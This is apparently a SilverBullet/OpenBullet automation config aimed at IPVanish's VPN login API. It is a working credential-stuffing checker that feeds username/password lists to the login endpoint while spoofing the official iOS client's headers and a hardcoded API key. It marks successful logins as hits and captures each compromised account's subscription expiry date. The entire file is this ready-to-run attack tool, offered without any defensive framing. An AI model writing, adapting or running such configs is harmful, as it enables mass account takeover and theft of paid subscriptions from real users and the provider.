[SETTINGS]
{
  "Name": "ipvanish.com",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2022-07-25T22:01:23.4805137+03:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "saa",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "ipvanish",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION RandomNum "1" "49" -> VAR "random" 

FUNCTION Translate 
  KEY "1" VALUE "11_0_1" 
  KEY "2" VALUE "11_0_2" 
  KEY "3" VALUE "11_0_3" 
  KEY "4" VALUE "11_1_1" 
  KEY "5" VALUE "11_1_2" 
  KEY "6" VALUE "11_2_1" 
  KEY "7" VALUE "11_2_2" 
  KEY "8" VALUE "11_2_5" 
  KEY "9" VALUE "11_2_6" 
  KEY "10" VALUE "11_3_1" 
  KEY "11" VALUE "11_4_1" 
  KEY "12" VALUE "12_0_1" 
  KEY "13" VALUE "12_1_1" 
  KEY "14" VALUE "12_1_2" 
  KEY "15" VALUE "12_1_3" 
  KEY "16" VALUE "12_1_4" 
  KEY "17" VALUE "12_3_1" 
  KEY "18" VALUE "12_4_1" 
  KEY "19" VALUE "12_4_2" 
  KEY "20" VALUE "12_4_3" 
  KEY "21" VALUE "12_4_4" 
  KEY "22" VALUE "12_4_5" 
  KEY "23" VALUE "12_4_6" 
  KEY "24" VALUE "12_4_7" 
  KEY "25" VALUE "12_4_8" 
  KEY "26" VALUE "12_4_9" 
  KEY "27" VALUE "12_5_1" 
  KEY "28" VALUE "12_5_2" 
  KEY "29" VALUE "12_5_3" 
  KEY "30" VALUE "12_5_4" 
  KEY "31" VALUE "12_5_5" 
  KEY "32" VALUE "13_1_1" 
  KEY "33" VALUE "13_1_2" 
  KEY "34" VALUE "13_1_3" 
  KEY "35" VALUE "13_2_2" 
  KEY "36" VALUE "13_2_3" 
  KEY "37" VALUE "13_3_1" 
  KEY "38" VALUE "13_4_1" 
  KEY "39" VALUE "13_5_1" 
  KEY "40" VALUE "13_6_1" 
  KEY "41" VALUE "14_0_1" 
  KEY "42" VALUE "14_4_1" 
  KEY "43" VALUE "14_4_2" 
  KEY "44" VALUE "14_5_1" 
  KEY "45" VALUE "14_7_1" 
  KEY "46" VALUE "15_0_1" 
  KEY "47" VALUE "15_0_2" 
  KEY "48" VALUE "15_2_1" 
  KEY "49" VALUE "15_3_1" 
  "<random>" -> VAR "iph" 

FUNCTION GenerateGUID -> VAR "guid" 

REQUEST POST "https://api.ipvanish.com/api/v3/login" 
  CONTENT "{\"username\":\"<USER>\",\"password\":\"<PASS>\",\"os\":\"iOS_<iph>\",\"api_key\":\"185f600f32cee535b0bef41ad77c1acd\",\"client\":\"IPVanishVPN_iOS_3.8.5_71936\",\"uuid\":\"<guid>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: api.ipvanish.com" 
  HEADER "Accept: */*" 
  HEADER "X-Client-Version: 3.8.5_71936" 
  HEADER "X-Platform-Version: <iph>" 
  HEADER "Accept-Encoding: br, gzip, deflate" 
  HEADER "Accept-Language: tr-tr" 
  HEADER "X-API-Version: 3.1" 
  HEADER "Content-Type: application/json" 
  HEADER "Content-Length: 204" 
  HEADER "User-Agent: IPVanishVPN/71936 CFNetwork/978.0.7 Darwin/18.7.0" 
  HEADER "Connection: keep-alive" 
  HEADER "X-Platform: iOS" 
  HEADER "X-Client: IPVanishVPN" 

KEYCHECK 
  KEYCHAIN Retry OR 
    KEY "403 Forbidden" 
  KEYCHAIN Failure OR 
    KEY "The username or password provided is incorrect" 
  KEYCHAIN Success OR 
    KEY "account_type\":" 

PARSE "<SOURCE>" LR "\"sub_end_epoch\":" ",\"" -> VAR "bitis" 

FUNCTION UnixTimeToISO8601 "<bitis>" -> CAP "bitistarihi" 

FUNCTION CurrentUnixTime -> VAR "time" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<time>" GreaterThan "<bitis>" 

